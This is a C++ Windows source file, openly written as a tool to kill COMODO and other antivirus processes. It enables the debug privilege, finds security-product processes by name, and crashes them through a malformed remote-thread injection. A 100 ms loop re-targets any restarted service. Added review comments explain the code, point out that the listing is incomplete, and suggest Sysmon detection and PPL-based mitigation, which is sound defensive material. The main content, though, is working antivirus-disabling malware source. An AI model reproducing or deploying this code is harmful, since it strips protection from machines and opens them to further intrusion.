//Kills COMODO, Avast and Micro$oft Frorefront
//crashes a target process by attempting to inject a dll without enough space allocated for DLL's name
//Code snippets taken from Blizzhackers.cc and Rohitab
//THX to Napalm,magnetisk, and Nihil² for letting me "borrow" your code
//Put together by Cpu_hacker666
//Yes, I IZ A CODE MONKEY XD
//
// NOTE(review): analyst summary of what the visible code does.
//  - Enables a privilege on its own token (SE_DEBUG_NAME is passed from WinMain).
//  - Enumerates processes with a Toolhelp snapshot and matches image names by
//    case-insensitive substring.
//  - For a match: OpenProcess(PROCESS_ALL_ACCESS) -> VirtualAllocEx ->
//    WriteProcessMemory -> CreateRemoteThread, i.e. the remote-thread injection
//    call sequence, used here to destabilise the target rather than load code.
//  - Only COMODO image names appear in this listing; the Avast and Forefront
//    targets named in the header are not present in what is shown.
// Detection: a non-system process enabling SeDebugPrivilege and then opening
// security-product processes with full access is the signal to alert on;
// Sysmon ProcessAccess (Event ID 10) and CreateRemoteThread (Event ID 8) record
// the two key steps. The poll loop repeats every 100 ms, so the events recur.
// Mitigation: where the product's processes run as protected processes (PPL),
// Windows restricts the access a non-protected caller can obtain even with
// SeDebugPrivilege; keeping users out of the local Administrators group removes
// the privilege this code depends on.
#include <iostream>
#include <windows.h>
#include <tlhelp32.h>
#include <shlwapi.h>
#define dll_name "lol"//Madeup DLL name, SHOULD NOT EXIST
using namespace std;
bool CrashProcess(DWORD procid);
void COMODO();
unsigned long GetProcID(const char *process);
BOOL EnablePriv(LPCSTR lpszPriv); // by Napalm

// Entry point: requests the debug privilege, starts one worker thread, then
// idles forever so the process never exits on its own.
// NOTE(review): `avast` is not declared anywhere in the visible source, so the
// listing is incomplete as shown. The EnablePriv result is ignored.
int WINAPI WinMain (HINSTANCE hThisInstance, HINSTANCE PrevInstance, LPSTR lpszArgument, int nFunsterStil)
{
    EnablePriv( SE_DEBUG_NAME );
    CreateThread( NULL, 0, (LPTHREAD_START_ROUTINE)&avast, 0, 0, NULL);
    // Keeps the main thread alive; the thread handle above is discarded.
    while(1)
    {
        Sleep(1);
    }
    return 0;
}

// Opens the process identified by procid with full access, allocates and writes
// a small buffer in it, and starts a remote thread there.
// Returns FALSE only when procid is 0; otherwise TRUE regardless of whether any
// of the API calls succeeded, because no return value is checked.
// The process handle `hd` is never closed.
bool CrashProcess(DWORD procid) //Based off magnetisk's poorly written code
{
    if(!procid)
    {
        return FALSE;
    }
    HANDLE hd;
    LPVOID gp,rs;
    gp = (LPVOID)GetProcAddress(GetModuleHandle("kernel32.lib"),"LoadLibraryA");
    // PROCESS_ALL_ACCESS on a security-product process is the request that
    // process-protection and handle-access telemetry should flag.
    hd = OpenProcess(PROCESS_ALL_ACCESS,FALSE,procid);
    // The buffer is strlen(dll_name) bytes, so the terminating NUL of the name
    // is neither allocated nor written. The header comment attributes the
    // target's crash to this; that is the author's claim, not verified here.
    rs = (LPVOID)VirtualAllocEx(hd, NULL, strlen(dll_name), MEM_RESERVE|MEM_COMMIT, PAGE_READWRITE);
    WriteProcessMemory(hd, (LPVOID)rs, dll_name,strlen(dll_name), NULL);
    CreateRemoteThread(hd,NULL,0,(LPTHREAD_START_ROUTINE)gp,(LPVOID)rs,0,0);
    return TRUE;
}

// Returns the PID of the first process in a Toolhelp snapshot whose executable
// name contains `process` (StrStrI: case-insensitive substring, not an exact
// match), or 0 when the snapshot fails or nothing matches.
// The snapshot handle is not closed on any path after it is created.
// On snapshot failure a message box titled "Loader" is shown, which is a
// user-visible artefact of this sample.
unsigned long GetProcID(const char *process) //by Nihil²
{
    PROCESSENTRY32 pe = {0};
    HANDLE thSnapshot = {0};
    BOOL retval = false;
    thSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
    if(thSnapshot == INVALID_HANDLE_VALUE)
    {
        MessageBox(NULL, "Error: Unable to create toolhelp snapshot!", "Loader", MB_ICONERROR);
        return 0;
    }
    // dwSize must be set before Process32First is called.
    pe.dwSize = sizeof(PROCESSENTRY32);
    retval = Process32First(thSnapshot, &pe);
    while(retval)
    {
        if(StrStrI(pe.szExeFile, process))
        {
            return pe.th32ProcessID;
        }
        retval = Process32Next(thSnapshot,&pe);
    }
    return 0;
}

// Enables the named privilege on the current process token.
// Returns FALSE if the token cannot be opened or the privilege name cannot be
// resolved; otherwise returns the result of AdjustTokenPrivileges.
// NOTE(review): AdjustTokenPrivileges can report success while assigning
// nothing (GetLastError() == ERROR_NOT_ALL_ASSIGNED); that case is not checked
// here, so a TRUE result does not prove the privilege is held. The call can
// only enable a privilege the token already carries, which for SE_DEBUG_NAME
// typically means an elevated administrator context.
BOOL EnablePriv(LPCSTR lpszPriv) // by Napalm
{
    HANDLE hToken;
    LUID luid;
    TOKEN_PRIVILEGES tkprivs;
    ZeroMemory(&tkprivs, sizeof(tkprivs));
    if(!OpenProcessToken(GetCurrentProcess(), (TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY), &hToken))
        return FALSE;
    if(!LookupPrivilegeValue(NULL, lpszPriv, &luid)){
        CloseHandle(hToken);
        return FALSE;
    }
    tkprivs.PrivilegeCount = 1;
    tkprivs.Privileges[0].Luid = luid;
    tkprivs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
    BOOL bRet = AdjustTokenPrivileges(hToken, FALSE, &tkprivs, sizeof(tkprivs), NULL, NULL);
    CloseHandle(hToken);
    return bRet;
}

// Polls forever, every 100 ms, for six COMODO image names and calls
// CrashProcess on each one that is found. Each name is looked up twice per
// pass (once for the test, once for the argument), so every hit costs two
// process snapshots. Because the loop never ends, a service that is restarted
// by its watchdog is targeted again on the next pass.
void COMODO()
{
    while(1)
    {
        if(GetProcID("cfp.exe")) CrashProcess(GetProcID("cfp.exe"));
        if(GetProcID("cfplogvw.exe")) CrashProcess(GetProcID("cfplogvw.exe"));
        if(GetProcID("cavscan.exe")) CrashProcess(GetProcID("cavscan.exe"));
        if(GetProcID("cfpupdat.exe")) CrashProcess(GetProcID("cfpupdat.exe"));
        if(GetProcID("cmdagent.exe")) CrashProcess(GetProcID("cmdagent.exe"));
        if(GetProcID("crashrep.exe")) CrashProcess(GetProcID("crashrep.exe"));
        Sleep(100);
    }
}